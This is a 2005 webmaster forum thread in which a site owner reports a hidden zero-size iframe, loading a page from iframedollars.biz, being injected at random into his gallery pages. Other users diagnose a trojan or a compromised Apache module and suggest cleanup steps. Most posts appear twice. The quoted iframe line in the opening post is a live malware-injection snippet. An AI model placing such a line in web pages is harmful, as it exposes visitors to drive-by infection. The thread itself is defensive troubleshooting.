Site possibly got hacked - GoFuckYourself.com

jamie55 · 05-10-2005, 06:00 AM

Hi,

I'm having some major problems with my site www.jamies-galleries.com . I am using Comus Thumbs and UCJ.

This code: <iframe src="http://iframedollars.biz/dl/adv514.php" width=0 height=0></iframe>

is randomly added to my mainpages, I've checked my templates and the code is not there. I appears and dissapears every X minutes, doesn't seem like a pattern to me, just random.

My host can't find anything on my server, and the author of Comus have checked too, he found nothing. I've added a firewall to my server which only allows me to access via FTP, I've also changed all my password - so there's no way anyone can get in manually. There has to be a script on the server somewhere, but can't find it ...

I'm loosing traffic and prod as we speak, if anyone have any experience with the same stuff, please reply asap as I really need your help!

Thanks for reading!

Regards,
Jamie

Doc911 · 05-10-2005, 06:19 AM

Trojan.Anicmoo

Holly · 05-10-2005, 06:24 AM

Don't click on that link unless you have some kind of AV running.

sixxxthsense · 05-10-2005, 06:26 AM

Quote:

Originally Posted by Holly

Don't click on that link unless you have some kind of AV running.

2 late hehe ''

i should be fine ;)

sixxxthsense · 05-10-2005, 06:27 AM

jamie do you use IE to edit comus thumbs pages?

fireorange · 05-10-2005, 06:27 AM

Yeah, I noticed it on Saturday.

http://www.gofuckyourself.com/showthread.php?t=464621

Spunky · 05-10-2005, 06:27 AM

Relatively harmless..see that on a few sites..do a search ..there was a thread about your site awhile back

Ramster · 05-10-2005, 06:29 AM

Too bad Jamie. Same thing has happened to many others. TommysBookmarks too and I think he said the infection was right in apache on the server.

jamie55 · 05-10-2005, 06:30 AM

Quote:

Originally Posted by sixxxthsense

jamie do you use IE to edit comus thumbs pages?

I use Opera 8.0 to edit Comus.

Regarding what spunky said, I had a kinda same situation to my site a while back, but that was a security breach within comus, that got patched immediately. I take it the same hacker didn't entirely loose contact with my server and can still do shit too it.

I did a search on GFY and found that thehun and sleazydream got attacked by the same stuff, can't get in touch with them unfortunately ...

Any ideas on what todo / check?

Thanks

fireorange · 05-10-2005, 06:30 AM

I read somewhere about a hacked up Apache module which inserts the code while serving the surfer the pages.

jamie55 · 05-10-2005, 06:33 AM

Quote:

Originally Posted by fireorange

Yeah, I noticed it on Saturday.

http://www.gofuckyourself.com/showthread.php?t=464621

Ahh shit, I saw that post now. I'll have my host check apache asap, see if there's anything in there.

jamie55 · 05-10-2005, 07:17 AM

Had my host check apache, he found nothing ... any other clues? I really need help on this!

Barefootsies · 05-10-2005, 07:26 AM

I had a similar problem when I first started my TGP but the problem was the page was going in the wrong directory. Simple and stupid I know, but I had to make sure to delete extra pages, and just keep the ../../whatever.shtml.

Basically what was happening was when it would do a page rebuild, it would use an older page, not the one with the code on it. So every 10-15 minutes I'd get an older version of the page, and through trial and error in the middle of the night found problem was just duplicates, and wrong directory.

Homer · 05-10-2005, 07:31 AM

theres a trojan

skillfull · 05-10-2005, 07:32 AM

the worst is that guy isnt even doing some nice cash with that

http://iframedollars.biz/dl/stats.php?adv=adv514

fireorange · 05-10-2005, 08:17 AM

I can't believe your host hasn't found the problem yet.

Bitchslap c h o o p a for me, I was gonna get a few servers from them last week!

darksoul · 05-10-2005, 08:21 AM

If you have root access to your server, hit me up I'll take a look.

MrVids · 05-10-2005, 08:31 AM

heya jamie, i know you said your host looked on your box to see what it is but the exploit is 99% for sure a module that was installed on Apache. Tell your host to look for mod_stats.so and see if it exists anywhere on the box and also check to see if it appears in your httpd.conf. i run a couple tgp's, and while i've been fortunate enough to not get hit by this, a good friend of mine has and that is what his hosting co ended up finding.

also, have your hosting co installed tripwire. it will do a reporte of any major files that were edited, so you can research things like this with a little more efficiency.

MrVids · 05-10-2005, 08:35 AM

whoa, i just checked out who you host with. my buddy that got hacked is also a customer of ch00pa. there must be something inherintly insecure about their apache setup. give a shout to their tech Kris, he was working on my buddy's site this weekend.

wdsguy · 05-10-2005, 08:35 AM

Your hosting co sucks if they can't find the problem within apache.

jamie55 · 05-10-2005, 08:55 AM

Ok, I've got it confirmed many times now, there is not a problem with apache.

My host says, "the problem is not with apache, it is with the software that runs on apache". hahahahahaha has been working on it for a 2 days now.

Quote:

whoa, i just checked out who you host with. my buddy that got hacked is also a customer of ch00pa. there must be something inherintly insecure about their apache setup. give a shout to their tech Kris, he was working on my buddy's site this weekend.

Host says my problem is completely different from what Kris was working on this weekend ...

Man this is giving me a headake

BigRod · 05-10-2005, 08:59 AM

Get a NEW host!

BigRod · 05-10-2005, 09:00 AM

If you want a kick ass host icq me!

jamie55 · 05-10-2005, 09:18 AM

MrVids, could you hit me up on icq: 162863896 , I just wanna ask you some questions, thanks!

SmokeyTheBear · 05-10-2005, 10:48 AM

hmmmmmm m

Ramster · 05-10-2005, 11:31 AM

Maybe your box was rooted. Check in any /tmp for anything owned by root. I also read that your root crontab for the html generator is a way a hacker might have gained access.

fireorange · 05-10-2005, 11:52 AM

Seriously though, once you're hacked, you gotta format the server and re-installing everything.

No doubt he's already installed a rootkit so you'll never be able to get rid of him.

05-10-2005, 06:00 AM	#1
jamie55 Registered User Join Date: Sep 2002 Posts: 50	Site possibly got hacked Hi, I'm having some major problems with my site www.jamies-galleries.com . I am using Comus Thumbs and UCJ. This code: <iframe src="http://iframedollars.biz/dl/adv514.php" width=0 height=0></iframe> is randomly added to my mainpages, I've checked my templates and the code is not there. I appears and dissapears every X minutes, doesn't seem like a pattern to me, just random. My host can't find anything on my server, and the author of Comus have checked too, he found nothing. I've added a firewall to my server which only allows me to access via FTP, I've also changed all my password - so there's no way anyone can get in manually. There has to be a script on the server somewhere, but can't find it ... I'm loosing traffic and prod as we speak, if anyone have any experience with the same stuff, please reply asap as I really need your help! Thanks for reading! Regards, Jamie

05-10-2005, 06:19 AM	#2
Doc911 Confirmed User Join Date: Feb 2004 Location: If i was up your ass you'd know Posts: 3,695	Trojan.Anicmoo __________________ For PHP/MySQL scripts ICQ 161480555 or email [email protected]

05-10-2005, 06:24 AM	#3
Holly Too lazy to set a custom title Join Date: Jun 2003 Location: Jesusland Posts: 10,017	Don't click on that link unless you have some kind of AV running. __________________ War National Damn Champions Eagle

05-10-2005, 06:27 AM	#7
Spunky I need a beer Industry Role: Join Date: Jun 2002 Location: ♠ Toiletville ♠ Posts: 133,940	Relatively harmless..see that on a few sites..do a search ..there was a thread about your site awhile back __________________ *YOUR INFORMATION HERE*

05-10-2005, 06:29 AM	#8
Ramster Confirmed User Industry Role: Join Date: Jul 2002 Location: Ottawa, Canada Posts: 1,447	Too bad Jamie. Same thing has happened to many others. TommysBookmarks too and I think he said the infection was right in apache on the server. __________________ Fcuk Cash - Backroom Casting Couch, ExCoGi, BlackAmbush DarkReach Cash - Top Pornstars & Sites Skype: robmurray999 Email: rob-at-paysitemanagers.com

05-10-2005, 06:27 AM	#5
sixxxthsense Confirmed User Join Date: Aug 2004 Location: Toronto Posts: 2,421	jamie do you use IE to edit comus thumbs pages?

05-10-2005, 06:27 AM	#6
fireorange Confirmed User Join Date: Jan 2005 Posts: 1,648	Yeah, I noticed it on Saturday. http://www.gofuckyourself.com/showthread.php?t=464621

05-10-2005, 06:30 AM	#10
fireorange Confirmed User Join Date: Jan 2005 Posts: 1,648	I read somewhere about a hacked up Apache module which inserts the code while serving the surfer the pages.

05-10-2005, 07:17 AM	#12
jamie55 Registered User Join Date: Sep 2002 Posts: 50	Had my host check apache, he found nothing ... any other clues? I really need help on this!

05-10-2005, 07:26 AM	#13
Barefootsies Choice is an Illusion Industry Role: Join Date: Feb 2005 Location: Land of Obama Posts: 42,635	I had a similar problem when I first started my TGP but the problem was the page was going in the wrong directory. Simple and stupid I know, but I had to make sure to delete extra pages, and just keep the ../../whatever.shtml. Basically what was happening was when it would do a page rebuild, it would use an older page, not the one with the code on it. So every 10-15 minutes I'd get an older version of the page, and through trial and error in the middle of the night found problem was just duplicates, and wrong directory. __________________ Should You Email Your Members? Link1 \| Link2 \| Link3 Enough Said. "Would you rather live like a king for a year or like a prince forever?"

05-10-2005, 07:31 AM	#14
Homer Confirmed User Join Date: Feb 2005 Posts: 6,780	theres a trojan __________________

05-10-2005, 07:32 AM	#15
skillfull Confirmed User Industry Role: Join Date: Apr 2003 Location: Quebec Calisse Posts: 4,716	the worst is that guy isnt even doing some nice cash with that http://iframedollars.biz/dl/stats.php?adv=adv514 __________________ mind at underdark dot cc SEO Analyst Thunder-Ball.net - Member

05-10-2005, 08:17 AM	#16
fireorange Confirmed User Join Date: Jan 2005 Posts: 1,648	I can't believe your host hasn't found the problem yet. Bitchslap c h o o p a for me, I was gonna get a few servers from them last week!

05-10-2005, 08:21 AM	#17
darksoul Confirmed User Join Date: Apr 2002 Location: /root/ Posts: 4,997	If you have root access to your server, hit me up I'll take a look. __________________ 1337 5y54\|)m1n: 157717888 BM-2cUBw4B2fgiYAfjkE7JvWaJMiUXD96n9tN Cambooth

05-10-2005, 08:31 AM	#18
MrVids i am a meat popsicle Industry Role: Join Date: Jan 2005 Location: Seattle, WA Posts: 1,070	heya jamie, i know you said your host looked on your box to see what it is but the exploit is 99% for sure a module that was installed on Apache. Tell your host to look for mod_stats.so and see if it exists anywhere on the box and also check to see if it appears in your httpd.conf. i run a couple tgp's, and while i've been fortunate enough to not get hit by this, a good friend of mine has and that is what his hosting co ended up finding. also, have your hosting co installed tripwire. it will do a reporte of any major files that were edited, so you can research things like this with a little more efficiency.

05-10-2005, 08:35 AM	#19
MrVids i am a meat popsicle Industry Role: Join Date: Jan 2005 Location: Seattle, WA Posts: 1,070	whoa, i just checked out who you host with. my buddy that got hacked is also a customer of ch00pa. there must be something inherintly insecure about their apache setup. give a shout to their tech Kris, he was working on my buddy's site this weekend.

05-10-2005, 08:35 AM	#20
wdsguy Ryde or Die Industry Role: Join Date: Dec 2002 Location: California-Shanghai Posts: 19,568	Your hosting co sucks if they can't find the problem within apache.

05-10-2005, 08:59 AM	#22
BigRod Confirmed User Join Date: Apr 2005 Location: Vancouver, BC Posts: 3,685	Get a NEW host! __________________ Rod Macdonald Mainstream Ad Agency Owner ICQ: 607306

05-10-2005, 09:00 AM	#23
BigRod Confirmed User Join Date: Apr 2005 Location: Vancouver, BC Posts: 3,685	If you want a kick ass host icq me! __________________ Rod Macdonald Mainstream Ad Agency Owner ICQ: 607306

05-10-2005, 09:18 AM	#24
jamie55 Registered User Join Date: Sep 2002 Posts: 50	MrVids, could you hit me up on icq: 162863896 , I just wanna ask you some questions, thanks!

05-10-2005, 10:48 AM	#25
SmokeyTheBear ►SouthOfHeaven Join Date: Jun 2004 Location: PlanetEarth MyBoardRank: GerbilMaster My-Penis-Size: extralarge MyWeapon: Computer Posts: 28,609	hmmmmmm m __________________ hatisblack at yahoo.com Last edited by SmokeyTheBear; 05-10-2005 at 10:49 AM..

05-10-2005, 11:31 AM	#26
Ramster Confirmed User Industry Role: Join Date: Jul 2002 Location: Ottawa, Canada Posts: 1,447	Maybe your box was rooted. Check in any /tmp for anything owned by root. I also read that your root crontab for the html generator is a way a hacker might have gained access. __________________ Fcuk Cash - Backroom Casting Couch, ExCoGi, BlackAmbush DarkReach Cash - Top Pornstars & Sites Skype: robmurray999 Email: rob-at-paysitemanagers.com

05-10-2005, 11:52 AM	#27
fireorange Confirmed User Join Date: Jan 2005 Posts: 1,648	Seriously though, once you're hacked, you gotta format the server and re-installing everything. No doubt he's already installed a rootkit so you'll never be able to get rid of him.